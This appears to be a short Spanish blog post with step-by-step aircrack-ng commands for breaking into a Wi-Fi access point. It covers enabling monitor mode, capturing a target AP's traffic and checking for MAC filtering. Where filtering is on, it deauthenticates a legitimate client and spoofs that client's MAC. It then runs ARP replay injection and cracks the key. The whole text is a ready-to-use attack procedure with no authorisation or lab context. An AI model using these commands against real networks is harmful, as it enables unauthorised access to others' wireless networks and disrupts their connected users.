Linea de comandos (terminal) como root:
1. Habilitar el modo monitor:
$ airmon-ng start (interface)
2. Captura de paquetes:
$ airodump-ng (interface)
Luego de identificar un AP objetivo:
$ airodump-ng --channel (#) --bssid (AP MAC) --write (file_name) (interface)
3. Verificar que el filtro MAC este activado o desactivado:
$ aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (Mi MAC) (interface)
Si en la salida se ve algo como esto...
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful :-)
...entonces el filtro MAC esta desactivado y podemos continuar con la sección 'No MAC
filtering', de otra forma salta a la sección 'MAC filtering'.
Sin filtro MAC
4. Reinjeccion de paquetes:
$ aireplay-ng -3 -b (AP MAC) -h (Mi MAC) (interface)
En esta parte veremos los paquetes de datos capturados y disparados en 'airodump-ng'. Este proceso puede durar 5 minutos antes de comenzar a recibir pedidos ARP. Como el filtro MAC esta deshabilitado, puedes utilizar una MAC address aleatoria.
Saltar al #7.
Con filtro MAC
5. Desautenticacion:
$ aireplay-ng -0 5 -a (AP MAC) -c (Client MAC) (interface)
6. Reinjeccion de paquetes:
$ aireplay-ng -3 -b (AP MAC) -h (Client MAC) (interface)
Veremos el numero de paquetes en 'airodump-ng'. Este proceso puede tomar mas de 5 minutos antes de empezar a recibir pedidos ARP, asi que sea paciente.
7. Desencriptado:
$ aircrack-ng (file_name).cap
Fuente: ubuntuforums
No hay comentarios:
Publicar un comentario